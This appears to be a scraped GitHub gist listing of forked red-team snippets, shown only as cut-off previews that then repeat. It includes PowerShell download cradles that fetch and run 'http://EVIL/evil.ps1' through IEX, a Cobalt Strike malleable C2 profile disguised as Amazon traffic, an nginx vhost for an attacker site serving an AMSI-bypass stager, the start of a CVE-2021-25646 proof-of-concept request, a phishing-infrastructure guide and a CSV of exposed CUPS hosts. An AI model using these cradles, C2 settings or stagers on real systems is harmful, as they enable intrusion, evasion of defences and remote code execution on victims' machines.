Christopher CalfCrusher

## hash_examples.md

      
              1 file
            
          
              7 forks
            
          
                0 comments
              
            
              7 stars
            
          
                CalfCrusher
                / hash_examples.md
            
            
              Created
              May 2, 2023 21:57
                — forked from dwallraff/hash_examples.md
            
              
                Hashcat hash types - https://hashcat.net/wiki/doku.php?id=example_hashes
              
          
Hashcat Example hashes

Unless otherwise noted, the password for all example hashes is hashcat


Hash-Mode
Hash-Name
Example


0
MD5
8743b52063cd84097a65d1633f5c74f5


10
md5($pass.$salt)
01dfae6e5d4d90d9892622325959afbe:7050461


## custom_amazon_empire_malleable.profile
#
# Modified Amazon browsing traffic profile
#

set sleeptime "10000";  # Increased sleep time to 10 seconds
set jitter    "500";    # Increased jitter to 500 milliseconds
set maxdns    "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent

http-get {

## generate-iso-image.py
# pip install pycdlib

try:
    from cStringIO import StringIO as BytesIO
except ImportError:
    from io import BytesIO

import pycdlib

iso = pycdlib.PyCdlib()

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

## Cobalt-Strike.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                CalfCrusher
                / Cobalt-Strike.md
            
            
              Created
              September 28, 2024 15:10
                — forked from z0rs/Cobalt-Strike.md
            
          
    list of contents


Infrastructure

Redirectors
Domain fronting


OpSec

Customer ID


Payloads

DNS Beacon


SMB Beacon


## cups-browsed.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                CalfCrusher
                / cups-browsed.md
            
            
              Created
              September 27, 2024 20:00
                — forked from stong/cups-browsed.md
            
              
                CUPS disclosure leaked online. Not my report. The original author is @evilsocket

              
    Original report

Affected Vendor: OpenPrinting
Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
Affected Version: All versions <= 2.0.1 (latest release) and master.
Significant ICS/OT impact? no
Reporter: Simone Margaritelli [evilsocket@gmail.com]
Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed:


https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8


## current.csv
ip,user_agent
116.202.x.x,CUPS/2.2.10 (Linux 4.19.0-17-amd64; x86_64) IPP/2.0
212.235.x.x,CUPS/2.2.7 (Linux 4.15.0-213-generic; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
5.9.x.x,CUPS/2.2.7 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
147.203.x.x,CUPS/2.2.7 (Linux 4.15.0-176-generic; x86_64) IPP/2.0
60.191.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
64.62.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0

## Red Team Phishing with Gophish.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                CalfCrusher
                / Red Team Phishing with Gophish.md
            
            
              Created
              September 27, 2024 08:58
                — forked from Ridter/Red Team Phishing with Gophish.md
            
          
    Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign.
This is the basic lifecycle of your phishingn campaign:
+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+


## CVE-2021-25646 POC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close


## nginx_example_vhost
limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;

server {
    root /var/www/attacker-site.com/html;
    index index.html;
    server_name attacker-site.com www.attacker-site.com;
    location / {
        try_files $uri $uri/ =404;
    }
    location = /bypassamsiandrequeststager.txt {
Hash-Mode	Hash-Name	Example
0	MD5	8743b52063cd84097a65d1633f5c74f5
10	md5($pass.$salt)	01dfae6e5d4d90d9892622325959afbe:7050461
	#
	# Modified Amazon browsing traffic profile
	#

	set sleeptime "10000"; # Increased sleep time to 10 seconds
	set jitter "500"; # Increased jitter to 500 milliseconds
	set maxdns "255";
	set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent

	http-get {
	# pip install pycdlib

	try:
	from cStringIO import StringIO as BytesIO
	except ImportError:
	from io import BytesIO

	import pycdlib

	iso = pycdlib.PyCdlib()
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object
	ip,user_agent
	116.202.x.x,CUPS/2.2.10 (Linux 4.19.0-17-amd64; x86_64) IPP/2.0
	212.235.x.x,CUPS/2.2.7 (Linux 4.15.0-213-generic; x86_64) IPP/2.0
	202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
	202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
	5.9.x.x,CUPS/2.2.7 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
	147.203.x.x,CUPS/2.2.7 (Linux 4.15.0-176-generic; x86_64) IPP/2.0
	60.191.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
	64.62.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
	POST /druid/indexer/v1/sampler HTTP/1.1
	Host: x.x.x.x:8888
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
	Accept: application/json, text/plain, /
	Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
	Content-Type: application/json
	Content-Length: 1045
	Connection: close
	limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;

	server {
	root /var/www/attacker-site.com/html;
	index index.html;
	server_name attacker-site.com www.attacker-site.com;
	location / {
	try_files $uri $uri/ =404;
	}
	location = /bypassamsiandrequeststager.txt {